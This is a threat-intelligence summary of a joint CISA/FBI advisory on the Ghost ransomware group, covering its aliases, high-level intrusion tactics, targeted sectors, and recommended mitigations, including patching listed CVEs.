Full Report
CISA and the FBI have released a joint advisory detailing the activity of China’s Ghost ransomware
Analysis Summary
# Threat Actor: Ghost Ransomware Group
## Attribution & Identity
* **Primary Affiliation:** Threat actor group originating from China.
* **Known Aliases:** Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture.
* **Attribution Source:** Joint advisory issued by the FBI, CISA, and MS-ISAC.
## Activity Summary
The group is involved in a long-running, financially motivated ransomware campaign that has compromised victim organizations in over 70 countries. They operate with speed, often progressing from initial compromise to ransomware deployment within the same day, indicating low persistence requirements. While they claim data exfiltration will lead to leak if the ransom is unpaid, observed activity suggests they infrequently exfiltrate significant amounts of sensitive data (IP or PII).
## Tactics, Techniques & Procedures
* **Initial Access:** Exploiting known vulnerabilities in public-facing systems, including:
* Fortinet FortiOS appliances
* Adobe ColdFusion servers
* Microsoft SharePoint
* Microsoft Exchange
* **Execution & Staging:** Uploading a web shell to compromised servers.
* **Command and Control (C2) & Post-Exploitation:** Leveraging Windows Command Prompt and/or PowerShell to download and execute Cobalt Strike Beacon malware for subsequent actions.
* **Defense Evasion:** Using Cobalt Strike to enumerate and disable anti-malware systems.
* **Lateral Movement & Privilege Escalation:** Using Cobalt Strike and various open-source tools.
* **Persistence:** Persistence is generally not a major focus; they typically spend only a few days on victim networks.
* **Impact:** Deployment of ransomware.
## Targeting
* **Sectors:** Small and Medium Businesses (SMBs), critical infrastructure providers, schools/universities, healthcare organizations, government bodies, religious institutions, and technology/manufacturing companies.
* **Geography:** Global (victims reported in over 70 countries).
* **Victims:** Broad range of sectors, described as going after "low-hanging fruit." No specific organizational victims were named in the provided context.
## Tools & Infrastructure
* **Malware families used:** Ghost Ransomware, Cobalt Strike Beacon (extensively used for C2, privilege escalation, credential access, and lateral movement).
* **Infrastructure (C2, domains, IPs):** Not explicitly detailed in the summary aside from the use of Cobalt Strike for C2 communications.
## Implications
The consistent targeting of known vulnerabilities and a fast "smash-and-grab" approach suggests the group prioritizes volume over sophisticated, deep compromise. Their reliance on well-known tools like Cobalt Strike indicates pragmatic use of readily available offensive tradecraft, although their geographic origin (China) is noted as unusual for ransomware actors. They are deterred by strong baseline security, segmentation, and MFA.
## Mitigations
* Regularly back up and store backups separately from source systems.
* Patch known vulnerabilities in a timely, risk-based manner, specifically including: CVE-2018-13379, CVE-2010-2861, CVE-2009-3960, CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.
* Implement network segmentation to restrict lateral movement.
* Deploy phishing-resistant Multi-Factor Authentication (MFA) for all privileged and email services accounts.